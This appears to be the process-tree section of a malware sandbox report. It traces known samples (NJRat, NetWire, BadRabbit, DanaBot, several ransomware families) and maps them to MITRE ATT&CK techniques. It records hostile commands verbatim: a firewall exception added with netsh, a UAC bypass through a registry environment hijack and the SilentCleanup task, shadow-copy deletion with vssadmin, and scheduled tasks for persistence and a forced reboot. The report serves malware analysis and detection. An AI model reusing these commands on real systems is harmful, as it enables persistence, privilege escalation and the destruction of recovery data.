"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
2⤵
PID:4384

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
2⤵
PID:1908

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:1
2⤵
PID:2020

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 /prefetch:8
2⤵
PID:212

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3856

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
2⤵
PID:904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
2⤵
PID:2992

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4164 /prefetch:1
2⤵
PID:5128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
2⤵
PID:5308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
2⤵
PID:5508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5772 /prefetch:8
2⤵
PID:5768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5696 /prefetch:8
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:5776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1
2⤵
PID:5984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=212 /prefetch:1
2⤵
PID:6116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1
2⤵
PID:6128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5492 /prefetch:8
2⤵
PID:5736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6468 /prefetch:1
2⤵
PID:5744

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6044 /prefetch:8
2⤵
PID:5960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6640 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
2⤵
PID:5956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4048 /prefetch:8
2⤵
PID:5540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1452 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3720 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4600

C:\Users\Admin\Downloads\NJRat.exe
"C:\Users\Admin\Downloads\NJRat.exe"
2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4848

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\Downloads\NJRat.exe" "NJRat.exe" ENABLE
3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5644

C:\Users\Admin\Downloads\NJRat.exe
"C:\Users\Admin\Downloads\NJRat.exe"
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2544

C:\Users\Admin\Downloads\NJRat.exe
"C:\Users\Admin\Downloads\NJRat.exe"
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6060

C:\Users\Admin\Downloads\NJRat.exe
"C:\Users\Admin\Downloads\NJRat.exe"
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5276

C:\Users\Admin\Downloads\NJRat.exe
"C:\Users\Admin\Downloads\NJRat.exe"
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:1
2⤵
PID:3456

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6484 /prefetch:8
2⤵
PID:6096

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5564 /prefetch:8
2⤵
PID:5836

C:\Users\Admin\Downloads\NetWire.exe
"C:\Users\Admin\Downloads\NetWire.exe"
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4964

C:\Users\Admin\Downloads\NetWire.exe
"C:\Users\Admin\Downloads\NetWire.exe"
3⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1812

C:\Windows\SysWOW64\Notepad.exe
C:\Windows\System32\Notepad.exe
4⤵
- System Location Discovery: System Language Discovery
PID:7032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Natso.bat" "
5⤵
- System Location Discovery: System Language Discovery
PID:7220

C:\Windows\SysWOW64\reg.exe
reg delete hkcu\Environment /v windir /f
6⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:8080

C:\Windows\SysWOW64\reg.exe
reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
6⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:8464

C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
6⤵
- Abuse Elevation Control Mechanism: Bypass User Account Control
- System Location Discovery: System Language Discovery
PID:8508

C:\Windows\SysWOW64\reg.exe
reg delete hkcu\Environment /v windir /f
6⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:8588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Runex.bat" "
5⤵
- System Location Discovery: System Language Discovery
PID:27308

C:\Windows \System32\fodhelper.exe
"C:\Windows \System32\fodhelper.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:39040

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
4⤵
PID:7712

C:\Users\Admin\Downloads\NetWire.exe
"C:\Users\Admin\Downloads\NetWire.exe"
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1704

C:\Users\Admin\Downloads\NetWire.exe
"C:\Users\Admin\Downloads\NetWire.exe"
3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 240
4⤵
- Program crash
PID:5408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:1
2⤵
PID:8828

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2024 /prefetch:8
2⤵
PID:8940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6824 /prefetch:8
2⤵
PID:8784

C:\Users\Admin\Downloads\CoronaVirus.exe
"C:\Users\Admin\Downloads\CoronaVirus.exe"
2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:2092

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
3⤵
PID:7640

C:\Windows\system32\mode.com
mode con cp select=1251
4⤵
PID:36544

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
4⤵
- Interacts with shadow copies
PID:27860

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
3⤵
PID:39920

C:\Windows\system32\mode.com
mode con cp select=1251
4⤵
PID:39236

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
4⤵
- Interacts with shadow copies
PID:39164

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
3⤵
PID:39732

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
3⤵
PID:39704

C:\Users\Admin\Downloads\CoronaVirus.exe
"C:\Users\Admin\Downloads\CoronaVirus.exe"
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5332

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6916 /prefetch:1
2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:37184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2220 /prefetch:8
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:37116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4908 /prefetch:8
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:19224

C:\Users\Admin\Downloads\DeriaLock.exe
"C:\Users\Admin\Downloads\DeriaLock.exe"
2⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:36620

C:\Users\Admin\Downloads\DeriaLock.exe
"C:\Users\Admin\Downloads\DeriaLock.exe"
2⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:36524

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:34096

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6884 /prefetch:8
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:33976

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6232 /prefetch:8
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:33208

C:\Users\Admin\Downloads\BadRabbit.exe
"C:\Users\Admin\Downloads\BadRabbit.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:32984

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
3⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:32804

C:\Windows\SysWOW64\cmd.exe
/c schtasks /Delete /F /TN rhaegal
4⤵
PID:32672

C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2836839790 && exit"
4⤵
PID:32488

C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 23:24:00
4⤵
PID:32440

C:\Windows\4479.tmp
"C:\Windows\4479.tmp" \\.\pipe\{6366A00B-1511-456F-A1E6-A3ECF266E7E8}
4⤵
- Executes dropped EXE
PID:32372

C:\Users\Admin\Downloads\BadRabbit.exe
"C:\Users\Admin\Downloads\BadRabbit.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:32844

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
3⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:32592

C:\Users\Admin\Downloads\BadRabbit.exe
"C:\Users\Admin\Downloads\BadRabbit.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:31752

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
3⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:31568

C:\Users\Admin\Downloads\BadRabbit.exe
"C:\Users\Admin\Downloads\BadRabbit.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:31608

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
3⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:31432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:1
2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:31160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1388 /prefetch:8
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:31108

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6992 /prefetch:8
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:30672

C:\Users\Admin\Downloads\$uckyLocker.exe
"C:\Users\Admin\Downloads\$uckyLocker.exe"
2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:30476

C:\Users\Admin\Downloads\$uckyLocker.exe
"C:\Users\Admin\Downloads\$uckyLocker.exe"
2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:30356

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7136 /prefetch:1
2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:30072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1
2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:30020

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3192

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1044

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5592

C:\Users\Admin\Downloads\DanaBot.exe
"C:\Users\Admin\Downloads\DanaBot.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6056

C:\Windows\SysWOW64\regsvr32.exe
C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@6056
2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5264

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f0
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 464
2⤵
- Program crash
PID:2240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 6056 -ip 6056
1⤵
PID:5420

C:\Users\Admin\Downloads\NJRat.exe
"C:\Users\Admin\Downloads\NJRat.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4380 -ip 4380
1⤵
PID:3008

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x404 0x33c
1⤵
PID:6528

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:39988

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\a2319400183a4c129bafc9934aea2b16 /t 39724 /p 39732
1⤵
PID:37968

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\05d8d50b2259442cb4cc88cc4fe124ff /t 39696 /p 39704
1⤵
PID:37736

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:35092

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Direct Volume Access

T1006

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

